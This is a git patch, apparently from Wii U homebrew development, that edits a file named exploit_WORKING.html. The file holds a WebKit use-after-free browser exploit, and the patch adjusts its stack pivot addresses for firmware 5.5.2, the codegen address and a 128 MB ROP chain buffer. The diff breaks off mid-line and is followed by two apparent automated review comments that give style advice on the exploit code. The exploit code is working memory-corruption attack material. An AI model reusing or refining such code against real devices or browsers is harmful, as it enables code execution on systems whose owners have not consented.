From 5d9ec5c5e9e2592ea9059a15a4388e9027c2dbcd Mon Sep 17 00:00:00 2001
From: WiiUTest <31256994+WiiUTest@users.noreply.github.com>
Date: Tue, 22 May 2018 16:39:25 +0200
Subject: [PATCH] 128MB Size

---
 payload/exploit_WORKING.html | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/payload/exploit_WORKING.html b/payload/exploit_WORKING.html
index 46dfd93..3a70342 100644
--- a/payload/exploit_WORKING.html
+++ b/payload/exploit_WORKING.html
@@ -15,7 +15,11 @@ function UaF(a)
 var ab = new ArrayBuffer(sizeWebCoreImageLoader);
 var dv = new DataView(ab)
- var pivotAdressAdress = 0x1CEE2000; //r6
+ //5.5.2
+ {
+ var pivotAdressAdress = 0x1B2E2000; //r6
+ var payloadAdress = pivotAdressAdress + 1720;
+ }
 /* 0:000:x86> dt webkit!WebCore::ImageLoader
 +0x000 __VFN_table : Ptr32
@@ -39,11 +43,7 @@ function UaF(a)
 var pivotAdress = 0x010ADDCC;
- //5.5.2
- {
- var pivotAdressAdress = 0x1CEE2000; //r6
- var payloadAdress = pivotAdressAdress + 1720;
- }
+ var codegenAddress = 0x01800000;
 var sprayCount = 0x1900;
 var _4K = 0x1000;
@@ -189,7 +189,7 @@ function UaF(a)
 //Construct the RopChain
 {
- var RopChainAB = new ArrayBuffer(100*1024*1024);
+ var RopChainAB = new ArrayBuffer(128*1024*1024);
 var RopChain = new DataView(RopChainAB);
 for(var j=0; j<_32K; j+=4){
 RopChain.setUint32(j, 0x10000000+j); //filler
@@ -242,8 +242,13 @@ function UaF(a)
 for(var i=0; i
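Review bot: The braces wrapped around the new `var pivotAdressAdress` and `var payloadAdress` declarations in the first hunk do not scope anything — `var` is function-scoped, so both names are hoisted to the top of `UaF` exactly as they were before, and the block only suggests an isolation that is not there. Since the file uses `var` throughout and later code relies on these names, the honest form is to drop the braces and keep the version marker on the declarations themselves, e.g. `var pivotAdressAdress = 0x1B2E2000; //r6, 5.5.2` and `var payloadAdress = pivotAdressAdress + 1720; //5.5.2`. The body of `UaF` starts and ends outside this hunk, so whether anything else still reads the old value cannot be confirmed from here.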
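Review bot: In the third hunk the new `new ArrayBuffer(128*1024*1024)` leaves the buffer size as an inline product, while the surrounding code already names its sizes (`_4K`, `_32K` are visible in the second and third hunks). Keeping the same convention, `var _128M = 128*1024*1024;` declared alongside `_4K` and `new ArrayBuffer(_128M)` here, makes the size change visible in one place and keeps the commit title "128MB Size" traceable to a named constant. The enclosing block and loop continue past the end of this hunk.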